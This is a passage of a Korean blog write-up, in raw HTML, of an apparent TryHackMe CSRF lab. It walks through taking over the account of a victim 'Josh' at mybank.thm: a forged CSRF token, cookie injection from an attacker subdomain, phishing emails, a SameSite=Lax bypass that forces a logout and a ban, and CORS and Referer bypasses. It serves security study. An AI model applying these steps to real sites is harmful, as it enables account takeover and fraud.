&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;피해자 Josh의 쿠키는 &lt;b&gt;[3-1]&lt;/b&gt; 실습에서 자동 송금되었을 때, 자동 로그인된 화면에서&lt;b&gt; f12&lt;/b&gt; (개발자 도구)에 들어가 확인할 수 있습니다.&lt;br /&gt;&lt;br /&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1194&quot; data-origin-height=&quot;495&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7YENp/dJMcadaLUf5/strrv1kOsz7ojM5KjNTalk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7YENp/dJMcadaLUf5/strrv1kOsz7ojM5KjNTalk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7YENp/dJMcadaLUf5/strrv1kOsz7ojM5KjNTalk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7YENp%2FdJMcadaLUf5%2Fstrrv1kOsz7ojM5KjNTalk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1194&quot; height=&quot;495&quot; data-origin-width=&quot;1194&quot; data-origin-height=&quot;495&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2)&amp;nbsp; 가짜 비밀번호 변경 form 생성&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;`&lt;/span&gt;&lt;b&gt;csrf-token&lt;/b&gt;`&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;가 &lt;b&gt;Base64&lt;/b&gt;로 인코딩되었음을 확인 &amp;rarr;CyberChef로 디코딩 &amp;rarr; 디코딩 결과가 계좌번호 &amp;rarr; 예측 가능&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;- 이를 통해 CSRF 토큰 생성&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격자 사이트 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;attacker.mybank.thm&lt;/b&gt;&lt;/span&gt;)에 CSRF 토큰이 포함된 &lt;b&gt;가짜 비밀번호 변경 form&lt;/b&gt; 생성&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;현재 공격자의 사이트 `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;attacker.mybank.thm&lt;/b&gt;&lt;/span&gt;`은 은행 사이트인 `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;`의 &lt;b&gt;subdomain&lt;/b&gt;입니다.&lt;br /&gt;현재 예시에서는 공격자가 DNS/서버 설정 권한을 통해 새로 만든 케이스입니다.&lt;br /&gt;XSS 취약점 등을 이용하거나 기존에 방치된 subdomain을 장악하여 사용할 수도 있습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3)&amp;nbsp; 피싱 메일 전송&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &quot;비밀번호 변경 필요&quot; 등의 메일을 보내 클릭 유도&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1059&quot; data-origin-height=&quot;437&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kZS3t/dJMb99M0qRk/jjuJdmGdl7PgatO7Od4OG1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kZS3t/dJMb99M0qRk/jjuJdmGdl7PgatO7Od4OG1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kZS3t/dJMb99M0qRk/jjuJdmGdl7PgatO7Od4OG1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkZS3t%2FdJMb99M0qRk%2FjjuJdmGdl7PgatO7Od4OG1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1059&quot; height=&quot;437&quot; data-origin-width=&quot;1059&quot; data-origin-height=&quot;437&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4)&amp;nbsp; Cookie Injection + Auto Submit&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;auto-submit&lt;/b&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(자동 전송)&lt;/span&gt; 코드 때문에 링크를 누르는 순간 비밀번호 변경 form이 자동 전송됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 같은 도메인 계열임을 이용해 subdomain인 `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;attacker.mybank.thm&lt;/b&gt;&lt;/span&gt;`에서 `&lt;b&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;mybank.thm&lt;/span&gt;&lt;/b&gt;`에 쿠키를 주입 및 설정&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;링크 클릭 후, 나오는 비밀번호 자동 기억 팝업 창에서 변경된 비밀번호를 확인할 수 있습니다&lt;br /&gt;&lt;br /&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;723&quot; data-origin-height=&quot;425&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/QVUOh/dJMcaaLXJN5/b3fgiK8xkChgvgaQyGoKO1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/QVUOh/dJMcaaLXJN5/b3fgiK8xkChgvgaQyGoKO1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/QVUOh/dJMcaaLXJN5/b3fgiK8xkChgvgaQyGoKO1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQVUOh%2FdJMcaaLXJN5%2Fb3fgiK8xkChgvgaQyGoKO1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;723&quot; height=&quot;425&quot; data-origin-width=&quot;723&quot; data-origin-height=&quot;425&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5)&amp;nbsp; 공격 성공&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;Form token&lt;/b&gt;과 &lt;b&gt;Cookie token&lt;/b&gt;이 같아 서버가 정상 요청으로 판단 (둘다 공격자가 만든 토큰)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 피해자의 비밀번호를 변경해 계정 탈취 성공&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[5]&amp;nbsp; Samesite Cookie Bypass&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Samesite Cookie&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- cross-site 요청 시, 브라우저 쿠키의 전송 여부를 결정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- cross-origin 데이터 유출, CSRF, XSS 방어에 효과적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[5-1] SameSite 속성의 3가지 값&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. Lax&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 적당한 수준의 보호&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- cookie는&lt;b&gt; top-level naviagtion&lt;/b&gt;(링크 클릭)이나 &lt;b&gt;안전한 HTTP 메서드&lt;/b&gt; (GET, HEAD, OPTIONS)에서 전송됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- cross-origin &lt;b&gt;POST&lt;/b&gt; 요청에는 쿠키가 포함되지 않음 &amp;rarr; CSRF 공격 방어&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 외부 사이트의 &lt;b&gt;GET&lt;/b&gt; 요청에는 쿠키가 포함&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;&lt;b&gt;top-level navigation&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;= 브라우저 주소창이 바뀌는 이동&lt;/span&gt;&lt;br /&gt;실습에서는 &quot;&lt;b&gt;&lt;a href=&quot;https://mybank.thm/logout.pnp&quot;&gt;https://mybank.thm/logout.pnp&lt;/a&gt;&lt;/b&gt;&quot; 페이지, 즉, 아예 다른 페이지로 이동하며 주소창 URL이 변경됩니다.&lt;br /&gt;이러한 상황이&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;top-level navigation&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;입니다.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;GET&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;요청 = 페이지 이동, 링크 클릭&lt;/span&gt;&lt;br /&gt;&lt;b&gt;POST&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;요청 = 데이터 전송&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. Strict&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 가장 강력한 보호&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 같은 origin&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(사이트)&lt;/span&gt;의 요청에만 쿠키 포함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. None&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 모든 요청에 쿠키 포함 = &lt;b&gt;same-site&lt;/b&gt;와 &lt;b&gt;cross-site&lt;/b&gt; 요청 모두에서 쿠키 포함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- HTTPS 환경에서 &lt;b&gt;Secure&lt;/b&gt; 속성이 있어야 안전 &amp;rarr; 암호화된 연결에서만 전송되도록 함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[5-2] SameSite=Lax 쿠키 환경 CSRF Exploit &lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1)&amp;nbsp; SameSite 속성 확인&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;-&lt;b&gt; [4-3]&lt;/b&gt; 에서 변경한 비밀번호로 Josh 계정 &lt;b&gt;로그인&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;b&gt;logout&lt;/b&gt;` 쿠키의 SameSite 속성 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1062&quot; data-origin-height=&quot;366&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qDJOC/dJMcafNifq1/06JW15mR2KCD9s6XbwTo5K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qDJOC/dJMcafNifq1/06JW15mR2KCD9s6XbwTo5K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qDJOC/dJMcafNifq1/06JW15mR2KCD9s6XbwTo5K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqDJOC%2FdJMcafNifq1%2F06JW15mR2KCD9s6XbwTo5K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1062&quot; height=&quot;366&quot; data-origin-width=&quot;1062&quot; data-origin-height=&quot;366&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= `&lt;b&gt;logout&lt;/b&gt;` cookie의 SameSite 속성은 &lt;b&gt;Lax&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;top-level navigation GET&lt;/b&gt; 요청에는 cookie 보냄 = CSRF 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2)&amp;nbsp; 피해자의 은행 사이트 로그아웃 유도&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 피해자는 새 비밀번호를 몰라 재로그인 불가 &amp;rarr; 공격자가 계정 통제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;링크 클릭&lt;/b&gt;을 유도하는 메일 전송&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;930&quot; data-origin-height=&quot;614&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cd32xJ/dJMcahEhsCo/0dNAaYCeYTXNcNAU0GOugK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cd32xJ/dJMcahEhsCo/0dNAaYCeYTXNcNAU0GOugK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cd32xJ/dJMcahEhsCo/0dNAaYCeYTXNcNAU0GOugK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcd32xJ%2FdJMcahEhsCo%2F0dNAaYCeYTXNcNAU0GOugK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;930&quot; height=&quot;614&quot; data-origin-width=&quot;930&quot; data-origin-height=&quot;614&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= &quot;&lt;b&gt;Survey Link&lt;/b&gt;&quot; 클릭하는 순간, 피해자는 은행 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;) 사이트에서 로그아웃 됨&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 59px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 59px;&quot;&gt;
&lt;td style=&quot;width: 100%; height: 59px;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;&quot;&lt;b&gt;Survey Link&lt;/b&gt;&quot;를 클릭하면, 브라우저가 `&lt;b&gt;mybank.thm/logout.php&lt;/b&gt;&quot; 라는 로그아웃 페이지로 이동합니다.&lt;br /&gt;이는 &lt;b&gt;GET&lt;/b&gt; 요청이기 때문에, &lt;b&gt;SameSite=Lax&lt;/b&gt; 속성인 &lt;b&gt;logout&lt;/b&gt; 쿠키가 같이 전송됩니다.&lt;br /&gt;같이 전송된 &lt;b&gt;logout&lt;/b&gt; 쿠키 때문에 서버는 정상 요청으로 인식하여 피해자가 은행 사이트에서 로그아웃됩니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3)&amp;nbsp; 피해자 계정 차단하기&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;b&gt;isBanned&lt;/b&gt;` 쿠키가 &quot;&lt;b&gt;true&lt;/b&gt;&quot; &amp;rarr; 피해자 계정 차단&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;985&quot; data-origin-height=&quot;338&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cRxoiS/dJMcai4dRi4/cGhVqT4DpbOLe43JXI5Duk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cRxoiS/dJMcai4dRi4/cGhVqT4DpbOLe43JXI5Duk/img.png&quot; data-alt=&quot;여기서 logout 쿠키 값도 변경할 수 있습니다!&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cRxoiS/dJMcai4dRi4/cGhVqT4DpbOLe43JXI5Duk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcRxoiS%2FdJMcai4dRi4%2FcGhVqT4DpbOLe43JXI5Duk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;985&quot; height=&quot;338&quot; data-origin-width=&quot;985&quot; data-origin-height=&quot;338&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;여기서 logout 쿠키 값도 변경할 수 있습니다!&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= &lt;b&gt;POST&lt;/b&gt; 요청으로 `&lt;b&gt;isBanned=true`&lt;/b&gt; 갱신&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 쿠키가 최근 2분 내에 생성 및 수정 &amp;rarr; 일시적으로 `&lt;b&gt;SameSite=None&lt;/b&gt;`처럼 동작 &amp;rarr; 일시적으로 &lt;b&gt;POST&lt;/b&gt; 요청 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4)&amp;nbsp; 공격 성공 여부 파악&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;Test Scenario - LAX+POST!&lt;/b&gt; 메일의 &quot;&lt;b&gt;Test Attack - Successful&quot;&lt;/b&gt; 버튼을 눌러 피해자 계정의 차단 여부 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;891&quot; data-origin-height=&quot;343&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cNkAOv/dJMcabKTSkl/YwgK0T0j8xqaBQDpncelkk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cNkAOv/dJMcabKTSkl/YwgK0T0j8xqaBQDpncelkk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cNkAOv/dJMcabKTSkl/YwgK0T0j8xqaBQDpncelkk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcNkAOv%2FdJMcabKTSkl%2FYwgK0T0j8xqaBQDpncelkk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;891&quot; height=&quot;343&quot; data-origin-width=&quot;891&quot; data-origin-height=&quot;343&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[6]&amp;nbsp; Few Additional Exploitation Techniques&lt;/b&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[6-1] XMLHttpRequest Exploitation &lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공격자가 사용자 몰래 사용자가 로그인한 웹사이트로 &lt;b&gt;AJAX&lt;/b&gt; 요청을 보냄&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 기존의&lt;b&gt; form 제출&lt;/b&gt; 역할을 &lt;b&gt;JavaScript AJAX&lt;/b&gt; 요청으로 수행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;SOP&lt;/b&gt; (Same-Origin Policy)는 응답 읽기를 막는 정책이라 JS를 읽을 수 없어 &lt;b&gt;cross-origin 요청 금지&lt;/b&gt;를 우회함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[6-2] S&lt;span style=&quot;background-color: #ffffff; color: #151c2b; text-align: start;&quot;&gt;ame Origin Policy (SOP) and Cross-Origin Resource Sharing (CORS) Bypass&lt;/span&gt; &lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 사용자의 브라우저를 속여 현재 접속한 사이트가 아닌 다른 웹사이트로 요청을 보냄&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;CORS&lt;/b&gt; 정책 = 허용된 origin에서만 요청 허용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;header('Access-Control-Allow-Origin: *')&lt;/b&gt;` 로 인해 모든 origin의 요청을 허용하면서 취약점 발생&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;`&lt;b&gt;Access-Control-Allow-Origin: *&lt;/b&gt;` = 어떤 origin (도메인)에서 요청이 와도 허용&lt;br /&gt;`&lt;b&gt;Access-Control-Allow-Credentials: true&lt;/b&gt;` = 쿠키/세션을 포함한 요청도 허용&lt;br /&gt;&amp;rarr; 절대 이 둘을 같이 사용하면 안됩니다&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[6-3] &lt;span style=&quot;background-color: #ffffff; color: #151c2b; text-align: start;&quot;&gt;Referer Header Bypass&lt;/span&gt; &lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- HTTP 요청 시, `&lt;b&gt;Referer&lt;/b&gt;` 헤더에는 현재 요청 직전에 방문한 페이지 URL이 포함됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; &lt;b&gt;Referer&lt;/b&gt;가 우리 도메인과 일치할 때만 요청 허용하는 웹사이트들 존재함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Referer&lt;/b&gt; 헤더는 브라우저 확장 프로그램, privacy tool, Referer를 생략하는 meta tag 등으로 변경 및 제거 가능&lt;/p&gt;
